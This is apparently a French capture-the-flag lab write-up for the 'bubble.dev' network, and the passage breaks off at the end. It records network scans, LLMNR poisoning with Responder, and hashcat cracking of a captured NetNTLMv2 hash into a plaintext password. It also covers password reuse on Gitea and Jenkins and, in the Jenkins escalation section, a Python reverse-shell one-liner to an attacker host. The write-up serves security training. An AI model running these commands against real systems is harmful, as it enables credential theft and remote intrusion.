protocol 2.0) | | 8080 | http | Jetty 10.0.20 | --- ## [Info] nmap 192.168.0.81 ```bash root@NewsLetter:/home/rebond# nmap -sV 192.168.0.81 -p 1-65000 Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 14:01 UTC Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 50.00% done; ETC: 14:03 (0:00:46 remaining) Nmap scan report for 192.168.0.81 Host is up (0.0000090s latency). Not shown: 64998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0) 3000/tcp open ppp? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3000-TCP:V=7.80%I=7%D=5/27%Time=66549251%P=x86_64-pc-linux-gnu%r(Ge SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x SF:20Request")%r(GetRequest,1000,"HTTP/1\.0\x20200\x20OK\r\nCache-Control: SF:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nConte SF:nt-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_gitea= SF:08a5c5196903186e;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Cookie SF::\x20_csrf=evIy1t3zoIUSe1yD4NGsT2Jq7586MTcxNjgxODUxMzY3NzI0MDE2Nw;\x20P SF:ath=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Option SF:s:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2027\x20May\x202024\x2014:01:53\x20G SF:MT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme- SF:auto\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=device SF:-width,\x20initial-scale=1\">\n\t<title>Gitea:\x20Git\x20with\x20a\x20c SF:up\x20of\x20tea</title>\n\t<link\x20rel=\"manifest\"\x20href=\"data:app SF:lication/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYS SF:IsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfd SF:XJsIjoiaHR0cDovLzE5Mi4xNjguMC44MTozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRw SF:Oi8vMTkyLjE2OC4wLjgxOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWF SF:nZS9wbmciLCJzaXp")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCon SF:tent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\ SF:r\n400\x20Bad\x20Request")%r(HTTPOptions,1D7,"HTTP/1\.0\x20405\x20Metho SF:d\x20Not\x20Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20HEAD\r\nAllow:\x20HE SF:AD\r\nAllow:\x20GET\r\nAllow:\x20HEAD\r\nAllow:\x20HEAD\r\nAllow:\x20GE SF:T\r\nCache-Control:\x20max-age=0,\x20private,\x20must-revalidate,\x20no SF:-transform\r\nSet-Cookie:\x20i_like_gitea=b46ae29f04d7958e;\x20Path=/;\ SF:x20HttpOnly;\x20SameSite=Lax\r\nSet-Cookie:\x20_csrf=apn2X3-a9aEDF3EHdQ SF:dqP2Kq7u06MTcxNjgxODUxODY5MzQwMjI3OA;\x20Path=/;\x20Max-Age=86400;\x20H SF:ttpOnly;\x20SameSite=Lax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20 SF:Mon,\x2027\x20May\x202024\x2014:01:58\x20GMT\r\nContent-Length:\x200\r\ SF:n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent SF:-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n4 SF:00\x20Bad\x20Request"); MAC Address: BC:24:11:E7:C7:CF (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 88.57 seconds ``` |port | protocol | service | |---|---|---| | 22 | ssh | OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0) | | 3000 | http | Gitea | --- ## [Info] nmap 192.168.0.100 ```bash PORT STATE SERVICE VERSION 53/tcp open domain? 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-27 21:06:58Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bubble.dev0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bubble.dev0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing 49664/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 54045/tcp open msrpc Microsoft Windows RPC 54053/tcp open msrpc Microsoft Windows RPC 54065/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=5/27%Time=66549389%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); MAC Address: BC:24:11:99:91:F7 (Unknown) Service Info: Host: WIN-3OQBLK21T8G; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 246.72 seconds ``` |port | protocol | service | |---|---|---| | 53 | domain? | - | | 88 | kerberos-sec | Microsoft Windows Kerberos (server time: 2024-05-27 21:06:58Z) | 135 | msrpc | Microsoft Windows RPC | | 139 | netbios-ssn | Microsoft Windows netbios-ssn | | 389 | ldap | Microsoft Windows Active Directory LDAP (Domain: bubble.dev0., Site: Default-First-Site-Name) | | 445 | microsoft-ds? | | 464 | kpasswd5? | | 593 | ncacn_http | Microsoft Windows RPC over HTTP 1.0 | | 636 | tcpwrapped | | 3268 | ldap | Microsoft Windows Active Directory LDAP (Domain: bubble.dev0., Site: Default-First-Site-Name) | | 3269 | tcpwrapped | | 3389 | ms-wbt-server Microsoft Terminal Services | | 5985 | http | Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | | 9389 | mc-nmf | .NET Message Framing | | 49664 | msrpc | Microsoft Windows RPC | | 49669 | msrpc | Microsoft Windows RPC | | 49671 | ncacn_http | Microsoft Windows RPC over HTTP 1.0 | | 54045 | msrpc | Microsoft Windows RPC | | 54053 | msrpc | Microsoft Windows RPC | | 54065 | msrpc | Microsoft Windows RPC | --- ## [Info] nmap 192.168.0.101 ```bash root@NewsLetter:/home/rebond# nmap -sV 192.168.0.101 -p 1-65000 Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 13:57 UTC Nmap scan report for 192.168.0.101 Host is up (0.00028s latency). Not shown: 64998 filtered ports PORT STATE SERVICE VERSION 3389/tcp open ms-wbt-server Microsoft Terminal Services 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) MAC Address: BC:24:11:4F:8B:17 (Unknown) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 125.18 seconds ``` |port | protocol | service | |---|---|---| | 3389 | ms-wbt-server | Microsoft Terminal Services | | 5985 | http | Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | --- ## [Info] nmap 192.168.0.200 ```bash root@NewsLetter:/home/rebond# nmap -sV 192.168.0.200 -p 1-65000 Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 13:54 UTC Nmap scan report for 192.168.0.200 Host is up (0.000085s latency). Not shown: 64998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0) 9999/tcp open http Apache httpd 2.4.52 ((Ubuntu)) MAC Address: BC:24:11:07:76:DF (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.36 seconds ``` | port | protocol | service | |---|---|---| | 22 | ssh | OpenSSH 9.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0) | | 9999 | http | Apache httpd 2.4.52 | --- ## [Info] 192.168.0.100 : LDAP Info ```bash root@NewsLetter:/home/rebond# nmap --script=ldap-rootdse 192.168.0.100 Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 14:19 UTC Nmap scan report for 192.168.0.100 Host is up (0.00029s latency). Not shown: 987 filtered ports PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap | ldap-rootdse: | LDAP Results | <ROOT> | domainFunctionality: 7 | forestFunctionality: 7 | domainControllerFunctionality: 7 | rootDomainNamingContext: DC=bubble,DC=dev | ldapServiceName: bubble.dev:win-3oqblk21t8g$@BUBBLE.DEV | isGlobalCatalogReady: TRUE | supportedSASLMechanisms: GSSAPI | supportedSASLMechanisms: GSS-SPNEGO | supportedSASLMechanisms: EXTERNAL | supportedSASLMechanisms: DIGEST-MD5 | supportedLDAPVersion: 3 | supportedLDAPVersion: 2 | supportedLDAPPolicies: MaxPoolThreads | supportedLDAPPolicies: MaxPercentDirSyncRequests | supportedLDAPPolicies: MaxDatagramRecv | supportedLDAPPolicies: MaxReceiveBuffer | supportedLDAPPolicies: InitRecvTimeout | supportedLDAPPolicies: MaxConnections | supportedLDAPPolicies: MaxConnIdleTime | supportedLDAPPolicies: MaxPageSize | supportedLDAPPolicies: MaxBatchReturnMessages | supportedLDAPPolicies: MaxQueryDuration | supportedLDAPPolicies: MaxDirSyncDuration | supportedLDAPPolicies: MaxTempTableSize | supportedLDAPPolicies: MaxResultSetSize | supportedLDAPPolicies: MinResultSets | supportedLDAPPolicies: MaxResultSetsPerConn | supportedLDAPPolicies: MaxNotificationPerConn | supportedLDAPPolicies: MaxValRange | supportedLDAPPolicies: MaxValRangeTransitive | supportedLDAPPolicies: ThreadMemoryLimit | supportedLDAPPolicies: SystemMemoryLimitPercent | supportedControl: 1.2.840.113556.1.4.319 | supportedControl: 1.2.840.113556.1.4.801 | supportedControl: 1.2.840.113556.1.4.473 | supportedControl: 1.2.840.113556.1.4.528 | supportedControl: 1.2.840.113556.1.4.417 | supportedControl: 1.2.840.113556.1.4.619 | supportedControl: 1.2.840.113556.1.4.841 | supportedControl: 1.2.840.113556.1.4.529 | supportedControl: 1.2.840.113556.1.4.805 | supportedControl: 1.2.840.113556.1.4.521 | supportedControl: 1.2.840.113556.1.4.970 | supportedControl: 1.2.840.113556.1.4.1338 | supportedControl: 1.2.840.113556.1.4.474 | supportedControl: 1.2.840.113556.1.4.1339 | supportedControl: 1.2.840.113556.1.4.1340 | supportedControl: 1.2.840.113556.1.4.1413 | supportedControl: 2.16.840.1.113730.3.4.9 | supportedControl: 2.16.840.1.113730.3.4.10 | supportedControl: 1.2.840.113556.1.4.1504 | supportedControl: 1.2.840.113556.1.4.1852 | supportedControl: 1.2.840.113556.1.4.802 | supportedControl: 1.2.840.113556.1.4.1907 | supportedControl: 1.2.840.113556.1.4.1948 | supportedControl: 1.2.840.113556.1.4.1974 | supportedControl: 1.2.840.113556.1.4.1341 | supportedControl: 1.2.840.113556.1.4.2026 | supportedControl: 1.2.840.113556.1.4.2064 | supportedControl: 1.2.840.113556.1.4.2065 | supportedControl: 1.2.840.113556.1.4.2066 | supportedControl: 1.2.840.113556.1.4.2090 | supportedControl: 1.2.840.113556.1.4.2205 | supportedControl: 1.2.840.113556.1.4.2204 | supportedControl: 1.2.840.113556.1.4.2206 | supportedControl: 1.2.840.113556.1.4.2211 | supportedControl: 1.2.840.113556.1.4.2239 | supportedControl: 1.2.840.113556.1.4.2255 | supportedControl: 1.2.840.113556.1.4.2256 | supportedControl: 1.2.840.113556.1.4.2309 | supportedControl: 1.2.840.113556.1.4.2330 | supportedControl: 1.2.840.113556.1.4.2354 | supportedCapabilities: 1.2.840.113556.1.4.800 | supportedCapabilities: 1.2.840.113556.1.4.1670 | supportedCapabilities: 1.2.840.113556.1.4.1791 | supportedCapabilities: 1.2.840.113556.1.4.1935 | supportedCapabilities: 1.2.840.113556.1.4.2080 | supportedCapabilities: 1.2.840.113556.1.4.2237 | subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=bubble,DC=dev | serverName: CN=WIN-3OQBLK21T8G,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=bubble,DC=dev | schemaNamingContext: CN=Schema,CN=Configuration,DC=bubble,DC=dev | namingContexts: DC=bubble,DC=dev | namingContexts: CN=Configuration,DC=bubble,DC=dev | namingContexts: CN=Schema,CN=Configuration,DC=bubble,DC=dev | namingContexts: DC=DomainDnsZones,DC=bubble,DC=dev | namingContexts: DC=ForestDnsZones,DC=bubble,DC=dev | isSynchronized: TRUE | highestCommittedUSN: 20702 | dsServiceName: CN=NTDS Settings,CN=WIN-3OQBLK21T8G,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=bubble,DC=dev | dnsHostName: WIN-3OQBLK21T8G.bubble.dev | defaultNamingContext: DC=bubble,DC=dev | currentTime: 20240527212003.0Z |_ configurationNamingContext: CN=Configuration,DC=bubble,DC=dev 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server 54045/tcp open unknown MAC Address: BC:24:11:99:91:F7 (Unknown) Service Info: Host: WIN-3OQBLK21T8G; OS: Windows Nmap done: 1 IP address (1 host up) scanned in 5.43 seconds ``` --- ## [Info] Monter tunnel SSH Monter le tunnel ```bash ssh -o "ServerAliveInterval 30" -i privatekey -N (non-interactive) proxy-user@proxy-host -L (link port-port) local-port:host-destination:port-destination # Exemple: ssh -o "ServerAliveInterval 30" -i rebond-privkey -N rebond@infra-05.ipssi.cloud -L 3389:192.168.0.101:3389 ``` --- ## [Info] Se connecter en RDP via tunnel ```bash ssh -o "ServerAliveInterval 30" -i rebond-privkey -N rebond@infra-05.ipssi.cloud -L 3389:192.168.0.101:3389 ``` Ouvrir `remmina` : ![image](https://hackmd.io/_uploads/B1wEoGzVR.png) ![image](https://hackmd.io/_uploads/rkyLiMME0.png) --- ## [Info] ffuf (Directory listing) sur 192.168.0.200 (via tunnel ssh) ```bash $ ffuf -u http://localhost:9999/FUZZ -w /usr/share/wordlists/dirb/common.txt -fw 8 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://localhost:9999/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response words: 8 ________________________________________________ [Status: 200, Size: 6011, Words: 1178, Lines: 249, Duration: 14ms] calc [Status: 200, Size: 6011, Words: 1178, Lines: 249, Duration: 11ms] login [Status: 200, Size: 113, Words: 12, Lines: 4, Duration: 19ms] mirror [Status: 200, Size: 103500, Words: 62, Lines: 12, Duration: 11ms] register [Status: 200, Size: 113, Words: 12, Lines: 4, Duration: 11ms] server-status [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 9ms] :: Progress: [4614/4614] :: Job [1/1] :: 139 req/sec :: Duration: [0:00:04] :: Errors: 0 :: ``` --- ## [Flag] site caché sur 192.168.0.200 (via tunnel ssh) `FLAG{M1r01RM1r01R}` > http://localhost:9999/mirror ![image](https://hackmd.io/_uploads/BJe13TXMN0.png) --- ## [Info] Enumeration des utilisateurs du domain (via kerberos) | user | domain | |---|---| | administrator | bubble.dev | ```bash root@NewsLetter:/home/rebond# nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='bubble.dev'" 192.168.0.100 Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-28 09:09 UTC Nmap scan report for 192.168.0.100 Host is up (0.00034s latency). PORT STATE SERVICE 88/tcp open kerberos-sec | krb5-enum-users: | Discovered Kerberos principals |_ administrator@bubble.dev MAC Address: BC:24:11:99:91:F7 (Unknown) Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds ``` --- ## [Info] Enumeration des utilisateurs de Gitea (192.168.0.81) ```xml $ curl http://localhost:3000/explore/users/sitemap-1.xml <?xml version="1.0" encoding="UTF-8"?> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <url> <loc>http://192.168.0.81:3000/localadm</loc> <lastmod>2024-05-24T20:45:53Z</lastmod> </url> </urlset> ``` --- ## [Info] Recuperation d'un utilisateur de l'ad | user | password | domain | hash | |---|---|---|---| | tomega | iamtheomega | bubble.dev | `tomega::BUBBLE:c91c3b887cd0a73a:AFAEC37F2937D265BC63B6896BB5CA92:01010000000000000001727076B0DA0167FD284F6B531FA30000000002000800460058004C004D0001001E00570049004E002D004300530042005A0041005700470054005A003600340004003400570049004E002D004300530042005A0041005700470054005A00360034002E00460058004C004D002E004C004F00430041004C0003001400460058004C004D002E004C004F00430041004C0005001400460058004C004D002E004C004F00430041004C00070008000001727076B0DA01060004000200000008003000300000000000000000000000002000001F7B1316DF2D9219F8C1341636166F34018122FC41E00A5F1C54F29E9277BE050A001000000000000000000000000000000000000900120063006900660073002F0074006F0074006F000000000000000000` | ```bash root@NewsLetter:~/kerbrute/Responder# python3 Responder.py -I eth0 -wF -v [!] Error starting TCP server on port 80, check permissions or other servers running. [!] Error starting TCP server on port 25, check permissions or other servers running. [] [NBT-NS] Poisoned answer sent to 192.168.0.101 for name TOTO (service: File Server) [] [MDNS] Poisoned answer sent to 192.168.0.101 for name toto.local [] [MDNS] Poisoned answer sent to fe80::dd0e:5afb:9a8c:a89b for name toto.local [] [MDNS] Poisoned answer sent to 192.168.0.101 for name toto.local [] [LLMNR] Poisoned answer sent to fe80::dd0e:5afb:9a8c:a89b for name toto [] [MDNS] Poisoned answer sent to fe80::dd0e:5afb:9a8c:a89b for name toto.local [] [LLMNR] Poisoned answer sent to 192.168.0.101 for name toto [] [LLMNR] Poisoned answer sent to fe80::dd0e:5afb:9a8c:a89b for name toto [*] [LLMNR] Poisoned answer sent to 192.168.0.101 for name toto [SMB] NTLMv2-SSP Client : fe80::dd0e:5afb:9a8c:a89b [SMB] NTLMv2-SSP Username : BUBBLE\tomega[SMB] NTLMv2-SSP Hash : tomega::BUBBLE:c91c3b887cd0a73a:AFAEC37F2937D265BC63B6896BB5CA92:01010000000000000001727076B0DA0167FD284F6B531FA30000000002000800460058004C004D0001001E00570049004E002D004300530042005A0041005700470054005A003600340004003400570049004E002D004300530042005A0041005700470054005A00360034002E00460058004C004D002E004C004F00430041004C0003001400460058004C004D002E004C004F00430041004C0005001400460058004C004D002E004C004F00430041004C00070008000001727076B0DA01060004000200000008003000300000000000000000000000002000001F7B1316DF2D9219F8C1341636166F34018122FC41E00A5F1C54F29E9277BE050A001000000000000000000000000000000000000900120063006900660073002F0074006F0074006F000000000000000000 ``` ```bash $ hashcat -m 5600 -a 0 -o cracked.txt hash.txt /home/kali/Downloads/rockyou.txt hashcat (v6.2.6) starting OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ================================================================================================================================================== * Device #1: cpu-sandybridge-Intel(R) Core(TM) i7-10870H CPU @ 2.20GHz, 1436/2937 MB (512 MB allocatable), 4MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 0 MB Dictionary cache building /home/kali/Downloads/rockyou.txt: 33553435 bytes (2Dictionary cache built: * Filename..: /home/kali/Downloads/rockyou.txt * Passwords.: 14344391 * Bytes.....: 139921497 * Keyspace..: 14344384 * Runtime...: 1 sec Cracking performance lower than expected? * Append -O to the commandline. This lowers the maximum supported password/salt length (usually down to 32). * Append -w 3 to the commandline. This can cause your screen to lag. * Append -S to the commandline. This has a drastic speed impact but can be better for specific attacks. Typical scenarios are a small wordlist but a large ruleset. * Update your backend API runtime / driver the right way: https://hashcat.net/faq/wrongdriver * Create more work items to make use of your parallelization power: https://hashcat.net/faq/morework Session..........: hashcat Status...........: Cracked Hash.Mode........: 5600 (NetNTLMv2) Hash.Target......: TOMEGA::BUBBLE:c91c3b887cd0a73a:afaec37f2937d265bc6...000000 Time.Started.....: Tue May 28 14:46:50 2024 (8 secs) Time.Estimated...: Tue May 28 14:46:58 2024 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/home/kali/Downloads/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 944.6 kH/s (0.43ms) @ Accel:256 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 7475200/14344384 (52.11%) Rejected.........: 0/7475200 (0.00%) Restore.Point....: 7474176/14344384 (52.11%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: ian**cons -> iamsospecial Hardware.Mon.#1..: Util: 55% Started: Tue May 28 14:46:24 2024 Stopped: Tue May 28 14:47:00 2024 Résultat └─$ cat cracked.txt TOMEGA::BUBBLE:c91c3b887cd0a73a:afaec37f2937d265bc63b6896bb5ca92:01010000000000000001727076b0da0167fd284f6b531fa30000000002000800460058004c004d0001001e00570049004e002d004300530042005a0041005700470054005a003600340004003400570049004e002d004300530042005a0041005700470054005a00360034002e00460058004c004d002e004c004f00430041004c0003001400460058004c004d002e004c004f00430041004c0005001400460058004c004d002e004c004f00430041004c00070008000001727076b0da01060004000200000008003000300000000000000000000000002000001f7b1316df2d9219f8c1341636166f34018122fc41e00a5f1c54f29e9277be050a001000000000000000000000000000000000000900120063006900660073002f0074006f0074006f000000000000000000:iamtheomega ``` --- ## [Flag] Nmap 192.168.0.123 `FLAG{8uBb1es3v3rywh3re}` Le flag se trouve en effectuant le nmap (ligne 1140) ```bash nmap -sV 192.168.0.123 -p 1-65000 Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-29 08:11 UTC Nmap scan report for 192.168.0.123 Host is up (0.000010s latency). Not shown: 64997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0) 80/tcp open http Bubble Web Server 3.0 8080/tcp open http Apache httpd 2.4.52 ((Ubuntu)) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port80-TCP:V=7.80%I=7%D=5/29%Time=6656E320%P=x86_64-pc-linux-gnu%r(NULL SF:,1CD,"HTTP/1\.1\x20200\x20OK\nServer:\x20Bubble\x20Web\x20Server\x203\. SF:0\nContent-Type:\x20text/html\n\n<!DOCTYPE\x20html>\n<html>\n<body>\n<p SF:>\ndvztjmff\x20laxhummx\x20qlxzpnsl\x20rqylvzkb\x20xjugxzni\x20blqvzcup SF:\x20qurhhjty\x20btlxuxar\x20guzdvnlw\x20ydtzinry\x20\n</p>\n<p>\njihqtc SF:qw\x20xbvsyvlg\x20rllmyzky\x20efxmvome\x20yuxtypqw\x20tlqthbaa\x20mnpmo SF:bkt\x20hkfeaskz\x20ohumzkks\x20yclhenhs\x20\n</p>\n<p>\ndwhryrkh\x20dsn SF:ekxfa\x20hzogmzak\x20bnrhbycg\x20xjxxckgg\x20ctmoqroz\x20scfedhoh\x20vf SF:qygsed\x20bdagpgmr\x20bahtrxtj\x20\n</p>\n<!--Page\x20served\x20by\x20B SF:ubble\x20Web\x20Server\x203\.00--></body>\n</html>\n")%r(TLSSessionReq, SF:216,"HTTP/1\.1\x20200\x20OK\nServer:\x20Bubble\x20Web\x20Server\x203\.0 SF:\nContent-Type:\x20text/html\n\n<!DOCTYPE\x20html>\n<html>\n<body>\n<h1 SF:>FLAG{8uBb1es3v3rywh3re}</h1>\n<p>\nrta\x20jie\x20pwf\x20snv\x20qcy\x20 SF:jqb\x20\n</p>\n<p>\najg\x20ivs\x20wiu\x20pqu\x20bhq\x20bsy\x20\n</p>\n< SF:p>\nhjx\x20nbm\x20itq\x20icj\x20jes\x20rmq\x20\n</p>\n<p>\nmly\x20gaq\x SF:20cbz\x20ser\x20tmb\x20sze\x20\n</p>\n<p>\nejy\x20vra\x20gbh\x20asv\x20 SF:qeg\x20rmj\x20\n</p>\n<p>\nhrm\x20jjt\x20aef\x20dwg\x20idp\x20gag\x20\n SF:</p>\n<p>\nigj\x20pge\x20lxk\x20tqx\x20ezo\x20tiz\x20\n</p>\n<p>\nmlg\x SF:20toc\x20bwf\x20qeh\x20ynn\x20kcw\x20\n</p>\n<p>\nopt\x20yjl\x20xpk\x20 SF:nit\x20nue\x20vpu\x20\n</p>\n<p>\nzqt\x20hix\x20ohm\x20ctr\x20yhg\x20th SF:r\x20\n</p>\n<!--Page\x20served\x20by\x20Bubble\x20Web\x20Server\x203\. SF:00--></body>\n</html>\n"); MAC Address: BC:24:11:A8:99:68 (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ## [Flag] Fichier text sur le Bureau (192.168.0.101) `FLAG{P4t1C13Nc31SEv3R1tH1nG}` > C:\Users\tomega\Desktop\Enquete.txt ![image](https://hackmd.io/_uploads/HyCGfIm40.png) ``` FLAG{P4t1C13Nc31SEv3R1tH1nG} Je suis en pleine enquete sur la personne qui administre mon ordinateur. Je pense que c'est lui qui vole des bulles dans le stock de bulles ! Il faudrait que j'ai acces a son compte mais aucune idee de comment faire... J'ai bien un collegue qui m'a donne le fichier BUUUULLLLLEEEEEESSS.txt sur mon bureau en me disant que je trouverais la reponse a toutes mes questions dedans mais j'ai l'impression qu'il a juste consomme trop de bulles..... ``` --- ## [Flag] Fichier cacher chez un utilisateur `FLAG{H1dD3nF1l3Sr34Lly?}` | Dénominatif | Supposé | Original | Traduite | |---|---|---|---| | f | Flag | `RkxBR3tIMWREM25GMWwzU3IzNExseT99Cg==` | `FLAG{H1dD3nF1l3Sr34Lly?}` | | adm | Administrator | `SkFET1JFTEVTQlVMTEVTCg==` | `JADORELESBULLES` | > C:\Users\Public\Public Bubbles\ .hidden.txt ![image(1)](https://hackmd.io/_uploads/Sysl3LmNA.png) ![image(2)](https://hackmd.io/_uploads/HJgZ2LQVC.png) ``` f:RkxBR3tIMWREM25GMWwzU3IzNExseT99Cg== adm:SkFET1JFTEVTQlVMTEVTCg== ``` ![image](https://hackmd.io/_uploads/rJxbLL74C.png) ``` FLAG{H1dD3nF1l3Sr34Lly?} JADORELESBULLES ``` --- ## [Flag] Fichier sur le Bureau de 192.168.0.101 (AD) `FLAG{M0i4u5SiJ4d0R3L3sBuLl35}` > C:\Users\Administrator\Desktop\flag.txt ![image](https://hackmd.io/_uploads/B1UfDLmNA.png) ``` FLAG{M0i4u5SiJ4d0R3L3sBuLl35} ``` --- ## [Info] [Faille - same password] obtention des identifiants de localadm (sur gitea) | utilisateur | mot de passe | |---|---| | localadm | iamtheomega | ![image](https://hackmd.io/_uploads/rkFtJ_mN0.png) ![image](https://hackmd.io/_uploads/ByA5ydQNC.png) ![image](https://hackmd.io/_uploads/ByPp1dXER.png) --- ## [Info] [Faille - same password] obtention des identifiants de localadm (sur jenkins) - Les meme que Gitea pour l'utilisateur `localadm` | utilisateur | mot de passe | |---|---| | localadm | iamtheomega | --- ## [Info] [Faille - CE - privileges escalation ] pipeline jenkins to root 192.168.0.80 ``` python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.2",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' ``` ![image](https://hackmd.io/_uploads/BkAdkYXVA.png) ![image](https://hackmd.io/_uploads/S1YCouXEA.png) ![image](https://hackmd.io/_uploads/SJSXndENR.png) ```bash $ ssh -o "ServerAliveInterval 